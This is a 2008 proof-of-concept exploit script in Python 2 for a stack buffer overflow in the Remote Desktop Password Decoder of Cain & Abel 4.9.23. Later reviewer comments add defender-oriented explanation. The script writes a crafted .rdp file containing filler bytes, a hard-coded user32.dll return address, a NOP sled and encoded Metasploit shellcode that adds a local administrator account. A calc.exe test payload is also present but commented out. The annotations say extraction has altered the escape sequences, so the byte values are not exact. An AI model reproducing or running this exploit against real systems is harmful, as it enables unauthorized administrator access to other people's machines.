
cainabel-overflow.txt

Posted on 04 December 2008

#exploit.py
# Historical (2008) proof-of-concept for a stack buffer overflow in the
# Remote Desktop Password Decoder of Cain & Abel 4.9.23, triggered by an
# oversized .rdp file. Python 2 syntax (print statements).
#
# Read from a defender's perspective, the file shows the classic crafted-input
# layout: a long run of one filler character, a hard-coded return address
# repeated, a short NOP sled, then the payload. A file of this shape is cheap
# to flag heuristically (see the write below).
#
# NOTE(review): the string literals in this rendering have been altered by
# extraction (escape sequences no longer appear as written by the author), so
# the byte values shown here must not be used as signatures or IoCs.
print ""
print " !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""
# Payload as described by the author's generator line below: a Metasploit
# win32_adduser payload (adds a local user "user"/"pass"), SEH exit, 232 bytes,
# PexFnstenvSub-encoded. Impact if triggered: creation of a local account,
# which is also the observable artifact (new local user) an investigator
# would look for.
# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13x46"
shellcode+= "xcdx10x60x83xebxfcxe2xf4xbax25x54x60x46xcdx9bx25"
shellcode+= "x7ax46x6cx65x3exccxffxebx09xd5x9bx3fx66xccxfbx29"
shellcode+= "xcdxf9x9bx61xa8xfcxd0xf9xeax49xd0x14x41x0cxdax6d"
shellcode+= "x47x0fxfbx94x7dx99x34x64x33x28x9bx3fx62xccxfbx06"
shellcode+= "xcdxc1x5bxebx19xd1x11x8bxcdxd1x9bx61xadx44x4cx44"
shellcode+= "x42x0ex21xa0x22x46x50x50xc3x0dx68x6cxcdx8dx1cxeb"
shellcode+= "x36xd1xbdxebx2exc5xfbx69xcdx4dxa0x60x46xcdx9bx08"
shellcode+= "x7ax92x21x96x26x9bx99x98xc5x0dx6bx30x2ex3dx9ax64"
shellcode+= "x19xa5x88x9exccxc3x47x9fxa1xaex7dx04x68xa8x68x05"
shellcode+= "x66xe2x73x40x28xa8x64x40x33xbex75x12x66xb8x63x05"
shellcode+= "x34xedx60x01x35xbex30x4fx07x89x54x40x60xebx30x0e"
shellcode+= "x23xb9x30x0cx29xaex71x0cx21xbfx7fx15x36xedx51x04"
shellcode+= "x2bxa4x7ex09x35xb9x62x01x32xa2x62x13x66xb8x63x05"
shellcode+= "x34xedx3fx21x02x89x10x60";
# Author's alternative, commented-out payload (launches calc.exe) for a
# benign test of the overflow; kept as the author left it.
# and if you want to test it..this shellcode will open calc.exe
#shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xb2"
#shellcode+= "xabx63x3dx83xebxfcxe2xf4x4ex43x27x3dxb2xabxe8x78"
#shellcode+= "x8ex20x1fx38xcaxaax8cxb6xfdxb3xe8x62x92xaax88x74"
#shellcode+= "x39x9fxe8x3cx5cx9axa3xa4x1ex2fxa3x49xb5x6axa9x30"
#shellcode+= "xb3x69x88xc9x89xffx47x39xc7x4exe8x62x96xaax88x5b"
#shellcode+= "x39xa7x28xb6xedxb7x62xd6x39xb7xe8x3cx59x22x3fx19"
#shellcode+= "xb6x68x52xfdxd6x20x23x0dx37x6bx1bx31x39xebx6fxb6"
#shellcode+= "xc2xb7xcexb6xdaxa3x88x34x39x2bxd3x3dxb2xabxe8x55"
#shellcode+= "x8exf4x52xcbxd2xfdxeaxc5x31x6bx18x6dxdax5bxe9x39"
#shellcode+= "xedxc3xfbxc3x38xa5x34xc2x55xc8x02x51xd1x85x06x45"
#shellcode+= "xd7xabx63x3d";
# Hard-coded return address: per the author's comment, a "jmp esp" inside
# user32.dll on the Windows XP SP3 build named in the banner. A fixed absolute
# address like this is only valid for one exact OS/DLL build, which is why
# address-space randomization (absent on XP) and module-load randomization
# are effective mitigations against this class of PoC.
eip = "xB7x2Fx49x7E" #user32.dll jmp esp 0x7E492FB7
# 8206 bytes of filler. Presumably sized so the bytes that follow land on the
# saved return address; the offset was found by the author and cannot be
# derived from this file alone.
chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
# Writes the crafted .rdp file: filler, the return address twice, an intended
# 10-byte NOP sled, then the payload. `file` shadows the Python 2 builtin and
# the handle is closed manually rather than via `with`; left unchanged here.
# Detection note: an .rdp file of roughly this size consisting almost entirely
# of one repeated character is an easy heuristic for content inspection.
file = open('cain.rdp','w')
file.write (chars+eip+eip+"x90"*10+shellcode)
file.close()
print "D0NE!"

 
